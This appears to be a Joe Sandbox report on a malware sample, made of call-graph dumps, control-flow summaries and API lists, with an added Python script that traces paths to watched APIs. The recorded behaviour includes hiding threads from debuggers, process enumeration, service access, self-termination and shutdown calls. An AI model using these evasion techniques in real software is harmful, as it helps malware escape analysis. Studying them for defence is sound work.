64075->64083 64078 6c207f33 __fassign MultiByteToWideChar 64076->64078 64077->64083 64080 6c1ff59b 64078->64080 64079->64083 64081 6c1ff5a2 GetLastError 64080->64081 64082 6c1ff5c8 64080->64082 64084 6c1ff48d __wsopen_s HeapFree GetLastError 64080->64084 64081->64083 64082->64083 64085 6c207f33 __fassign MultiByteToWideChar 64082->64085 64083->64029 64084->64082 64086 6c1ff5df 64085->64086 64086->64081 64086->64083 64088 6c217c17 64087->64088 64090 6c217bfd 64087->64090 64089 6c217b6c __wsopen_s 18 API calls 64088->64089 64094 6c217c4f 64089->64094 64090->64088 64091 6c203810 __Getctype 18 API calls 64090->64091 64091->64088 64092 6c217c7e 64093 6c219001 __wsopen_s 18 API calls 64092->64093 64095 6c217779 64092->64095 64096 6c217ccc 64093->64096 64094->64092 64098 6c203810 __Getctype 18 API calls 64094->64098 64095->64053 64101 6c214cfc 64095->64101 64096->64095 64097 6c217d49 64096->64097 64099 6c20383d __Getctype 11 API calls 64097->64099 64098->64092 64100 6c217d55 64099->64100 64102 6c214d08 __wsopen_s 64101->64102 64103 6c203a8f std::_Lockit::_Lockit EnterCriticalSection 64102->64103 64108 6c214d0f 64103->64108 64104 6c214d34 64106 6c214f32 __wsopen_s 11 API calls 64104->64106 64105 6c214e06 __wsopen_s LeaveCriticalSection 64107 6c214d76 64105->64107 64109 6c214d39 64106->64109 64107->64053 64114 6c217b47 CreateFileW 64107->64114 64108->64104 64110 6c214da3 EnterCriticalSection 64108->64110 64111 6c214d56 64108->64111 64109->64111 64113 6c215080 __wsopen_s EnterCriticalSection 64109->64113 64110->64111 64112 6c214db0 LeaveCriticalSection 64110->64112 64111->64105 64112->64108 64113->64111 64114->64037 64115->64045 64116->64043 64117->64046 64118->64047 64120 6c214c92 __wsopen_s 18 API calls 64119->64120 64122 6c20f025 64120->64122 64121 6c20f02b 64123 6c214e0f __wsopen_s SetStdHandle 64121->64123 64122->64121 64125 6c214c92 __wsopen_s 18 API calls 64122->64125 64131 6c20f05d 64122->64131 64124 6c20f083 __dosmaperr 64123->64124 64124->64053 64127 6c20f054 
64125->64127 64126 6c214c92 __wsopen_s 18 API calls 64128 6c20f069 CloseHandle 64126->64128 64129 6c214c92 __wsopen_s 18 API calls 64127->64129 64128->64121 64130 6c20f075 GetLastError 64128->64130 64129->64131 64130->64121 64131->64121 64131->64126 64132->64050 64133->64057 64134->64059 64135->63935 64137 6c204299 64136->64137 64138 6c2042ae 64136->64138 64174 6c203810 18 API calls __Getctype 64137->64174 64141 6c2042a9 64138->64141 64152 6c2043a9 64138->64152 64141->63938 64146 6c2042d1 64167 6c20ef88 64146->64167 64148 6c2042d7 64148->64141 64175 6c207eab HeapFree GetLastError __dosmaperr 64148->64175 64150->63936 64151->63936 64153 6c2043c1 64152->64153 64154 6c2042c3 64152->64154 64153->64154 64155 6c20d350 18 API calls 64153->64155 64158 6c20be2e 64154->64158 64156 6c2043df 64155->64156 64176 6c20f25c 64156->64176 64159 6c20be45 64158->64159 64160 6c2042cb 64158->64160 64159->64160 64259 6c207eab HeapFree GetLastError __dosmaperr 64159->64259 64162 6c20d350 64160->64162 64163 6c20d371 64162->64163 64164 6c20d35c 64162->64164 64163->64146 64260 6c203810 18 API calls __Getctype 64164->64260 64166 6c20d36c 64166->64146 64168 6c20efae 64167->64168 64172 6c20ef99 __dosmaperr 64167->64172 64169 6c20efd5 64168->64169 64171 6c20eff7 __dosmaperr 64168->64171 64261 6c20f0b1 64169->64261 64269 6c203810 18 API calls __Getctype 64171->64269 64172->64148 64174->64141 64175->64141 64177 6c20f268 __wsopen_s 64176->64177 64178 6c20f2ba 64177->64178 64179 6c20f270 __dosmaperr 64177->64179 64181 6c20f323 __dosmaperr 64177->64181 64187 6c215080 EnterCriticalSection 64178->64187 64179->64154 64217 6c203810 18 API calls __Getctype 64181->64217 64182 6c20f2c0 64185 6c20f2dc __dosmaperr 64182->64185 64188 6c20f34e 64182->64188 64216 6c20f31b LeaveCriticalSection __wsopen_s 64185->64216 64187->64182 64189 6c20f370 64188->64189 64215 6c20f38c __dosmaperr 64188->64215 64190 6c20f3c4 64189->64190 64192 6c20f374 __dosmaperr 64189->64192 64191 6c20f3d7 64190->64191 64226 6c20e359 20 API 
calls __wsopen_s 64190->64226 64218 6c20f530 64191->64218 64225 6c203810 18 API calls __Getctype 64192->64225 64197 6c20f42c 64199 6c20f440 64197->64199 64200 6c20f485 WriteFile 64197->64200 64198 6c20f3ed 64201 6c20f3f1 64198->64201 64202 6c20f416 64198->64202 64205 6c20f475 64199->64205 64206 6c20f44b 64199->64206 64203 6c20f4a9 GetLastError 64200->64203 64200->64215 64201->64215 64227 6c20f94b 6 API calls __wsopen_s 64201->64227 64228 6c20f5a1 43 API calls 5 library calls 64202->64228 64203->64215 64231 6c20f9b3 7 API calls 2 library calls 64205->64231 64208 6c20f450 64206->64208 64209 6c20f465 64206->64209 64212 6c20f455 64208->64212 64208->64215 64230 6c20fb77 8 API calls 3 library calls 64209->64230 64211 6c20f463 64211->64215 64229 6c20fa8e 7 API calls 2 library calls 64212->64229 64215->64185 64216->64179 64217->64179 64219 6c2150d5 __wsopen_s 18 API calls 64218->64219 64220 6c20f541 64219->64220 64221 6c20f3e8 64220->64221 64232 6c2080a2 GetLastError 64220->64232 64221->64197 64221->64198 64224 6c20f57e GetConsoleMode 64224->64221 64225->64215 64226->64191 64227->64215 64228->64215 64229->64211 64230->64211 64231->64211 64233 6c2080bf 64232->64233 64234 6c2080b9 64232->64234 64235 6c20a252 __Getctype 6 API calls 64233->64235 64239 6c2080c5 SetLastError 64233->64239 64236 6c20a213 __Getctype 6 API calls 64234->64236 64237 6c2080dd 64235->64237 64236->64233 64238 6c2080e1 64237->64238 64237->64239 64240 6c20a8d5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 64238->64240 64245 6c208153 64239->64245 64246 6c208159 64239->64246 64241 6c2080ed 64240->64241 64243 6c2080f5 64241->64243 64244 6c20810c 64241->64244 64247 6c20a252 __Getctype 6 API calls 64243->64247 64249 6c20a252 __Getctype 6 API calls 64244->64249 64245->64221 64245->64224 64248 6c2041b9 __Getctype 35 API calls 64246->64248 64250 6c208103 64247->64250 64251 6c20815e 64248->64251 64252 6c208118 64249->64252 64256 6c207eab _free HeapFree GetLastError 64250->64256 64253 6c20811c 
64252->64253 64254 6c20812d 64252->64254 64255 6c20a252 __Getctype 6 API calls 64253->64255 64258 6c207eab _free HeapFree GetLastError 64254->64258 64255->64250 64257 6c208109 64256->64257 64257->64239 64258->64257 64259->64160 64260->64166 64262 6c20f0bd __wsopen_s 64261->64262 64270 6c215080 EnterCriticalSection 64262->64270 64264 6c20f0cb 64265 6c20f0f8 64264->64265 64266 6c20f015 __wsopen_s 21 API calls 64264->64266 64271 6c20f131 LeaveCriticalSection __wsopen_s 64265->64271 64266->64265 64268 6c20f11a 64268->64172 64269->64172 64270->64264 64271->64268 64272->63770 64273->63775 64274->63770 64275->63770 64276->63770 64278 6c0c022e 64277->64278 64279 6c0970c4 64278->64279 64284 6c204ecb 64278->64284 64279->63785 64281->63787 64282->63789 64283->63791 64285 6c204ef6 64284->64285 64286 6c204ed9 64284->64286 64285->64278 64286->64285 64287 6c204ee6 64286->64287 64288 6c204efa 64286->64288 64300 6c203810 18 API calls __Getctype 64287->64300 64292 6c2050f2 64288->64292 64293 6c2050fe __wsopen_s 64292->64293 64301 6c1ffc99 EnterCriticalSection 64293->64301 64295 6c20510c 64302 6c2050af 64295->64302 64299 6c204f2c 64299->64278 64300->64285 64301->64295 64310 6c20bc96 64302->64310 64308 6c2050e9 64309 6c205141 LeaveCriticalSection 64308->64309 64309->64299 64311 6c20d350 18 API calls 64310->64311 64312 6c20bca7 64311->64312 64313 6c2150d5 __wsopen_s 18 API calls 64312->64313 64315 6c20bcad __wsopen_s 64313->64315 64314 6c2050c3 64317 6c204f2e 64314->64317 64315->64314 64327 6c207eab HeapFree GetLastError __dosmaperr 64315->64327 64319 6c204f40 64317->64319 64321 6c204f5e 64317->64321 64318 6c204f4e 64328 6c203810 18 API calls __Getctype 64318->64328 64319->64318 64319->64321 64324 6c204f76 _Yarn 64319->64324 64326 6c20bd49 62 API calls 64321->64326 64322 6c2043a9 62 API calls 64322->64324 64323 6c20d350 18 API calls 64323->64324 64324->64321 64324->64322 64324->64323 64325 6c20f25c __wsopen_s 62 API calls 64324->64325 64325->64324 64326->64308 64327->64314 64328->64321 
64330 6c1f9715 64329->64330 64331 6c0c2020 52 API calls 64330->64331 64332 6c1f97b6 64331->64332 64333 6c1fa133 std::_Facet_Register 4 API calls 64332->64333 64334 6c1f97ee 64333->64334 64335 6c1faa17 43 API calls 64334->64335 64336 6c1f9802 64335->64336 64337 6c0c1d90 89 API calls 64336->64337 64338 6c1f98ab 64337->64338 64339 6c1f98dc 64338->64339 64383 6c0c2250 30 API calls 64338->64383 64339->63802 64341 6c1f9916 64384 6c0c26e0 24 API calls 4 library calls 64341->64384 64343 6c1f9928 64385 6c1fca69 RaiseException 64343->64385 64345 6c1f993d 64386 6c0be010 67 API calls 64345->64386 64347 6c1f994f 64347->63802 64349 6c1f9a7d 64348->64349 64387 6c1f9c90 64349->64387 64351 6c1f9b6c 64351->63809 64354 6c1f9a95 64354->64351 64405 6c0c2250 30 API calls 64354->64405 64406 6c0c26e0 24 API calls 4 library calls 64354->64406 64407 6c1fca69 RaiseException 64354->64407 64357 6c0d304f 64356->64357 64361 6c0d3063 64357->64361 64416 6c0c3560 32 API calls std::_Xinvalid_argument 64357->64416 64360 6c0d311e 64363 6c0d3131 64360->64363 64417 6c0c37e0 32 API calls std::_Xinvalid_argument 64360->64417 64361->64360 64418 6c0c2250 30 API calls 64361->64418 64419 6c0c26e0 24 API calls 4 library calls 64361->64419 64420 6c1fca69 RaiseException 64361->64420 64363->63809 64367 6c1f928e 64366->64367 64370 6c1f92c1 64366->64370 64369 6c0c01f0 64 API calls 64367->64369 64368 6c1f9373 64368->63814 64371 6c1f92b4 64369->64371 64370->64368 64421 6c0c2250 30 API calls 64370->64421 64373 6c204208 67 API calls 64371->64373 64373->64370 64374 6c1f939e 64422 6c0c2340 24 API calls 64374->64422 64376 6c1f93ae 64423 6c1fca69 RaiseException 64376->64423 64378 6c1f93b9 64424 6c0be010 67 API calls 64378->64424 64380 6c1f9412 std::ios_base::_Ios_base_dtor 64380->63814 64381->63806 64382->63811 64383->64341 64384->64343 64385->64345 64386->64347 64388 6c1f9ccc 64387->64388 64389 6c1f9cf8 64387->64389 64390 6c1f9cf1 64388->64390 64410 6c0c2250 30 API calls 64388->64410 64395 6c1f9d09 64389->64395 64408 
6c0c3560 32 API calls std::_Xinvalid_argument 64389->64408 64390->64354 64393 6c1f9ed8 64411 6c0c2340 24 API calls 64393->64411 64395->64390 64409 6c0c2f60 42 API calls 4 library calls 64395->64409 64396 6c1f9ee7 64412 6c1fca69 RaiseException 64396->64412 64400 6c1f9f17 64414 6c0c2340 24 API calls 64400->64414 64402 6c1f9f2d 64415 6c1fca69 RaiseException 64402->64415 64404 6c1f9d43 64404->64390 64413 6c0c2250 30 API calls 64404->64413 64405->64354 64406->64354 64407->64354 64408->64395 64409->64404 64410->64393 64411->64396 64412->64404 64413->64400 64414->64402 64415->64390 64416->64361 64417->64363 64418->64361 64419->64361 64420->64361 64421->64374 64422->64376 64423->64378 64424->64380 64425 6c073d62 64427 6c073bc0 64425->64427 64426 6c073e8a GetCurrentThread NtSetInformationThread 64428 6c073eea 64426->64428 64427->64426 64429 6c08f150 64431 6c08efbe 64429->64431 64430 6c08f243 CreateFileA 64434 6c08f2a7 64430->64434 64431->64430 64432 6c0902ca 64433 6c0902ac GetCurrentProcess TerminateProcess 64433->64432 64434->64432 64434->64433 64435 6c20262f 64436 6c20263b __wsopen_s 64435->64436 64437 6c202642 GetLastError ExitThread 64436->64437 64438 6c20264f 64436->64438 64439 6c2080a2 __Getctype 37 API calls 64438->64439 64440 6c202654 64439->64440 64447 6c20d456 64440->64447 64443 6c20266b 64453 6c20259a 16 API calls 2 library calls 64443->64453 64446 6c20268d 64448 6c20265f 64447->64448 64449 6c20d468 GetPEB 64447->64449 64448->64443 64452 6c20a45f 5 API calls std::_Lockit::_Lockit 64448->64452 64449->64448 64450 6c20d47b 64449->64450 64454 6c20a508 5 API calls std::_Lockit::_Lockit 64450->64454 64452->64443 64453->64446 64454->64448
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: HR^
                                              • API String ID: 4218353326-1341859651
                                              • Opcode ID: b71220695ef09e9a6b66b036ffba22f7de04717df49750cc91dcf38deb6b1ce0
                                              • Instruction ID: 340cb61cddf92042de6c2bed7097d4626c766a6586cab1cd1dddb91ab01024a2
                                              • Opcode Fuzzy Hash: b71220695ef09e9a6b66b036ffba22f7de04717df49750cc91dcf38deb6b1ce0
                                              • Instruction Fuzzy Hash: 0F741471645B028FC738CF28C8D0795B7F2EF85318B598A2DC0A68BB55EB74B54ACB50

                                              Control-flow Graph

                                              control_flow_graph for the function at 6c1f8930 (20 basic blocks; the rendered graph is not reproducible in text). Blocks that call out: 6c1f8930-6c1f8964 CreateToolhelp32Snapshot (entry); 6c1f8a34-6c1f8a62 call 6c1ff010, then Process32FirstW; 6c1f8a64-6c1f8a71 Process32NextW; 6c1f8a14-6c1f8a2f CloseHandle; 6c1f89a0-6c1f89ca call 6c2062f5. The Process32FirstW and Process32NextW blocks both fall through to 6c1f8a76-6c1f8a86. Nine of the graph's edges, including those from the entry block, from 6c1f8a76-6c1f8a86, from the CloseHandle block and from the call-6c2062f5 block, lead back to 6c1f8980-6c1f8989, which then fans out through 6c1f898b-6c1f8990 and 6c1f89d0-6c1f89d5: a single dispatcher block re-entered from almost everywhere, a shape consistent with control-flow flattening rather than a plain enumeration loop.
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C1F893E
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CreateSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3332741929-0
                                              • Opcode ID: 012e0a8bbbf19a826a0cc13209229ad4df181b3d8ae351e5323f499571ee8eb0
                                              • Instruction ID: 0918fbfc80000e28d0efc035e0ef2f4cdf33fa8fdb4a08f37a66cce947dc1808
                                              • Opcode Fuzzy Hash: 012e0a8bbbf19a826a0cc13209229ad4df181b3d8ae351e5323f499571ee8eb0
                                              • Instruction Fuzzy Hash: DD317E702193059FEB01DF1AC88474ABBE4BF9A718F54492EE4E8D63A0D735D846CB53
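The graph sections of this report are text dumps of what the Joe Sandbox IDA plugin renders as a picture: `<id> <address> <labels…>` declares a node (a function in a call graph, or a `start-end` basic block in a control-flow graph), `<id>-><id>` is a directed edge, and `<n> API calls` / `<n> library calls` are per-node counts. The parser below is an added example, not part of the report or of Joe Sandbox's own tooling; it reads that token stream, separates Windows API names from CRT/STL labels and call-count summaries, and answers the triage question the dump is useful for: from a given node, which watch-listed APIs are reachable and through which nodes. The sample input is constructed from node lines that appear on this page; the two edges `63617->63639` and `63639->63657` are invented so that the sample contains a path worth tracing, and the watch-list is an assumption drawn from the report's signature names.

```python
import re
from collections import deque

# Token shapes in a Joe Sandbox IDA-plugin graph dump, as printed on this page:
#   "63798 6c1f9450 GetCurrentProcess OpenProcessToken"  node id, address, labels
#   "4604 6c1f8930-6c1f8964 CreateToolhelp32Snapshot"    basic block with an address range
#   "63639->63798"                                        directed edge
#   "4 API calls" / "24 API calls 4 library calls"       per-node call-count summaries
NODE_ID = re.compile(r"^\d+$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{8})?$")
# Windows API names as the plugin prints them (CamelCase: NtSetInformationThread,
# Process32FirstW); CRT/STL labels (_strlen, _Yarn, std::ios_base::...) do not match.
API_NAME = re.compile(r"^[A-Z][A-Za-z0-9]+$")

# Assumed watch-list, chosen from this report's own signature names: privilege
# adjustment plus power action, shutdown, thread hiding, self-termination.
WATCHLIST = {
    "AdjustTokenPrivileges", "NtInitiatePowerAction", "ExitWindowsEx",
    "NtSetInformationThread", "TerminateProcess",
}

def _new_node():
    return {"addr": None, "apis": [], "labels": [], "summary": []}

def parse_callgraph(text):
    """Parse the flat token stream into {"nodes": {id: node}, "edges": [(src, dst)]}."""
    tokens = text.split()
    nodes, edges = {}, []
    cur = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.append((m.group(1), m.group(2)))
            i += 1
            continue
        if NODE_ID.match(tok):
            # "<n> API calls" / "<n> library calls" are counts on the current
            # node, not new node ids: swallow all three tokens.
            if i + 1 < len(tokens) and tokens[i + 1] in ("API", "library"):
                if cur is not None:
                    cur["summary"].append(" ".join(tokens[i:i + 3]))
                i += 3
                continue
            cur = nodes.setdefault(tok, _new_node())
        elif cur is not None:
            if cur["addr"] is None and ADDR.match(tok):
                cur["addr"] = tok
            elif API_NAME.match(tok):
                cur["apis"].append(tok)
            else:
                cur["labels"].append(tok)  # _strlen, std::..., "call", callee addresses
        i += 1
    # Edges may name nodes that were never declared with an address.
    for src, dst in edges:
        nodes.setdefault(src, _new_node())
        nodes.setdefault(dst, _new_node())
    return {"nodes": nodes, "edges": edges}

def addresses_calling(graph, api):
    """Sorted addresses of every node whose label list names `api`."""
    return sorted(n["addr"] for n in graph["nodes"].values()
                  if n["addr"] and api in n["apis"])

def shortest_paths_to_apis(graph, root, watchlist):
    """BFS from `root`; for each watched API, the shortest node-id path reaching it.
    APIs not reachable from `root` are simply absent from the result."""
    succ = {}
    for src, dst in graph["edges"]:
        succ.setdefault(src, []).append(dst)
    parent = {root: None}
    queue = deque([root])
    found = {}
    while queue:
        node = queue.popleft()
        for api in graph["nodes"].get(node, _new_node())["apis"]:
            if api in watchlist and api not in found:
                path, step = [], node
                while step is not None:
                    path.append(step)
                    step = parent[step]
                found[api] = path[::-1]
        for nxt in succ.get(node, []):
            if nxt not in parent:
                parent[nxt] = node
                queue.append(nxt)
    return found

def triage(text, root):
    """Map each reachable watch-listed API to the address chain that reaches it."""
    graph = parse_callgraph(text)
    return {api: [graph["nodes"][n]["addr"] for n in path]
            for api, path in shortest_paths_to_apis(graph, root, WATCHLIST).items()}

# Constructed sample: node lines copied from this report's dump; the edges
# 63617->63639 and 63639->63657 are invented so that there is a path to trace.
SAMPLE = (
    "63617 6c07775a _strlen 63618 6c077b92 63620 6c1fa133 std::_Facet_Register "
    "4 API calls 63617->63618 63618->63620 "
    "63639 6c079624 63798 6c1f9450 GetCurrentProcess OpenProcessToken "
    "LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63639->63798 "
    "63657 6c07f7c0 63656 6c07fbb8 63658 6c07fbe8 ExitWindowsEx Sleep "
    "63657->63656 63656->63658 "
    "64427 6c073bc0 64426 6c073e8a GetCurrentThread NtSetInformationThread 64427->64426 "
    "63617->63639 63639->63657"
)

if __name__ == "__main__":
    for api, chain in triage(SAMPLE, "63617").items():
        print(f"{api:24s} {' -> '.join(chain)}")
```

Run as a script it prints, for each watch-listed API reachable from node 63617, the address chain that reaches it: AdjustTokenPrivileges and NtInitiatePowerAction via 6c07775a -> 6c079624 -> 6c1f9450, ExitWindowsEx via 6c07775a -> 6c079624 -> 6c07f7c0 -> 6c07fbb8 -> 6c07fbe8. NtSetInformationThread at 6c073e8a is not reachable from that root in the sample, so it is left out of the result rather than reported with an empty path. The same functions accept the report's full dumps unchanged; the only format detail that needs care is the bare count in "4 API calls", which would otherwise be taken for a node id.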

                                              Control-flow Graph

                                              control_flow_graph for the function whose first listed block is 6c073886-6c07388e (about 120 basic blocks spanning 6c07383b to 6c07414b; the rendered graph is not reproducible in text). Blocks that call out: 6c07383b-6c073855, 6c073bc0-6c073bda and 6c073eea-6c073f04 each call 6c1c2a20 and then 6c1c2a30; 6c073e81-6c073ee0 calls 6c073750 and then GetCurrentThread followed by NtSetInformationThread, the pairing that sandbox signatures such as this report's "Hides threads from debuggers" typically match on. Every other block is a call-free compare-and-branch block.
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d225c6772c62e9ea8e5c5c53d630627811867b254720423d804477260800aa69
                                              • Instruction ID: b2f31b8e5f16e9eb72f993f2adc2ea52e3af98af408013161bed8f90c58ad4f3
                                              • Opcode Fuzzy Hash: d225c6772c62e9ea8e5c5c53d630627811867b254720423d804477260800aa69
                                              • Instruction Fuzzy Hash: C632E532245B018FD338CF28C890795B7E3EFD93147698A6CC0EA4BA95D775B44ACB64
                                              APIs
                                              Similarity
                                              • API ID: CurrentThread
                                              • String ID:
                                              • API String ID: 2882836952-0
                                              • Opcode ID: f05c6386200e496bccc56ea9e0c716812b195b27dd7a2e9161af440685f42145
                                              • Instruction ID: d6742960f0c97649ade1e3caf74efc914e685c32fe4a25650963519a513a6a89
                                              • Opcode Fuzzy Hash: f05c6386200e496bccc56ea9e0c716812b195b27dd7a2e9161af440685f42145
                                              • Instruction Fuzzy Hash: 8E51D031244B018FD338CF28C884785B7E3BF99314F698A5DC0E61BA95DB75B44ACB65
                                              APIs
                                              Similarity
                                              • API ID: CurrentThread
                                              • String ID:
                                              • API String ID: 2882836952-0
                                              • Opcode ID: 0530cefbd15124de6f3ed36b95eb547ccffc3b56242429cf441d2c4c0568c67a
                                              • Instruction ID: bc5303720fb885cde6685a811d3b12c2e150a60d52b5e84cbe946323fd750b58
                                              • Opcode Fuzzy Hash: 0530cefbd15124de6f3ed36b95eb547ccffc3b56242429cf441d2c4c0568c67a
                                              • Instruction Fuzzy Hash: 7451D131104B018FD338CF28C484799B7E3BF99314F658A1DC0E65BA95DB71B446CBA5
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 6C073E9D
                                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C073EAA
                                              Similarity
                                              • API ID: Thread$CurrentInformation
                                              • String ID:
                                              • API String ID: 1650627709-0
                                              • Opcode ID: 2ac0a8e10ec7ff61ef26907679aea4c1fa16942a1de331df86ee111f4830aaf7
                                              • Instruction ID: fcf3abb0342a1e054c222738179be68f9ea1940a83ae26f1730c68ca6d43992f
                                              • Opcode Fuzzy Hash: 2ac0a8e10ec7ff61ef26907679aea4c1fa16942a1de331df86ee111f4830aaf7
                                              • Instruction Fuzzy Hash: 38310131245B01CFD738CF64C8887CAB7E3AF9A314F598A1CC0A65BA80DB747409CB66
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 6C073E9D
                                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C073EAA
                                              Similarity
                                              • API ID: Thread$CurrentInformation
                                              • String ID:
                                              • API String ID: 1650627709-0
                                              • Opcode ID: b8b52ce76aeb878c027e0b8b5367e4e7fce267b77ada50fdbf6a3530e046eb46
                                              • Instruction ID: f1245baa27f99b6a636a2fc72b636f91b2493b2ec4613c9f7cb001d50a450299
                                              • Opcode Fuzzy Hash: b8b52ce76aeb878c027e0b8b5367e4e7fce267b77ada50fdbf6a3530e046eb46
                                              • Instruction Fuzzy Hash: 5F31EF31114B01CFE738CF68C49479AB7E2AF9A304F654A1CC0AA5BA81DB71B445CBA6
                                              APIs
                                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C1F8820
                                              • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6C1F88C5
                                              Similarity
                                              • API ID: Open$ManagerService
                                              • String ID:
                                              • API String ID: 2351955762-0
                                              • Opcode ID: b0a74ee042c9700f83482c7ee981acb88dc474661e0ead964cee9554449cf402
                                              • Instruction ID: 309c3b1610765b9a5290c442b5481df239e1cd6e0df758d4f9157b0909f268a5
                                              • Opcode Fuzzy Hash: b0a74ee042c9700f83482c7ee981acb88dc474661e0ead964cee9554449cf402
                                              • Instruction Fuzzy Hash: 12311A74508305AFD7009F29C849A0EBBF0AB9A754F54885EF4A4D7261D271C859CB63
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 6C073E9D
                                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C073EAA
                                              Similarity
                                              • API ID: Thread$CurrentInformation
                                              • String ID:
                                              • API String ID: 1650627709-0
                                              • Opcode ID: 0aa88e13ad34df7511b90fa87f625ec6e9e839bce5c49525dfaeef18f06696c6
                                              • Instruction ID: a5ec34db43fb7541f95c7cc18cfd19c6e4a7940803939ab854d16134bad01f0a
                                              • Opcode Fuzzy Hash: 0aa88e13ad34df7511b90fa87f625ec6e9e839bce5c49525dfaeef18f06696c6
                                              • Instruction Fuzzy Hash: 5721F470258701DFE738CF64C89479AB7F2AF5A304F554A1DD0A64BAD0DB74B404CB66
                                              APIs
                                              • FindFirstFileA.KERNEL32(?,?), ref: 6C1EE0AC
                                              • FindClose.KERNEL32(000000FF), ref: 6C1EE0E2
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: 6cea0ab05c07911ab3b3b4d83eada43963ce0caf7e871cbeececbca5d5b6c77e
                                              • Instruction ID: 2de5b75587bf54edcc92abad9d637308fa10317c006cac43ae0060307ee6c1f2
                                              • Opcode Fuzzy Hash: 6cea0ab05c07911ab3b3b4d83eada43963ce0caf7e871cbeececbca5d5b6c77e
                                              • Instruction Fuzzy Hash: 08113A7460CB51DFC7108F28D944A4ABBF4AF8A324F148D4AF4A8C7790D734DA88CB92

                                              Control-flow Graph

                                              Strings
                                              Similarity
                                              • API ID:
                                              • String ID: 8Q
                                              • API String ID: 0-4022487301
                                              • Opcode ID: f8182716db9b3b6fd685ff31f568313041ba3b4376745a2cd5fdc99a1e180343
                                              • Instruction ID: 191fced18d0bc5e75d0f90ea3e2b4bd4a4aeab6bbd58ab3c7eb0e340b04ef22e
                                              • Opcode Fuzzy Hash: f8182716db9b3b6fd685ff31f568313041ba3b4376745a2cd5fdc99a1e180343
                                              • Instruction Fuzzy Hash: 76C1F570A0928EAFDF01CF99C880BADBBF1BF4A315F10415AEE14A7B81C7719955CB61

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 6C217B47: CreateFileW.KERNEL32(00000000,00000000,?,6C217805,?,?,00000000,?,6C217805,00000000,0000000C), ref: 6C217B64
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C217870
                                              • __dosmaperr.LIBCMT ref: 6C217877
                                              • GetFileType.KERNEL32(00000000), ref: 6C217883
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C21788D
                                              • __dosmaperr.LIBCMT ref: 6C217896
                                              • CloseHandle.KERNEL32(00000000), ref: 6C2178B6
                                              • CloseHandle.KERNEL32(6C20E7C0), ref: 6C217A03
                                              • GetLastError.KERNEL32 ref: 6C217A35
                                              • __dosmaperr.LIBCMT ref: 6C217A3C
                                              Strings
                                              Similarity
                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                              • String ID: 8Q
                                              • API String ID: 4237864984-4022487301
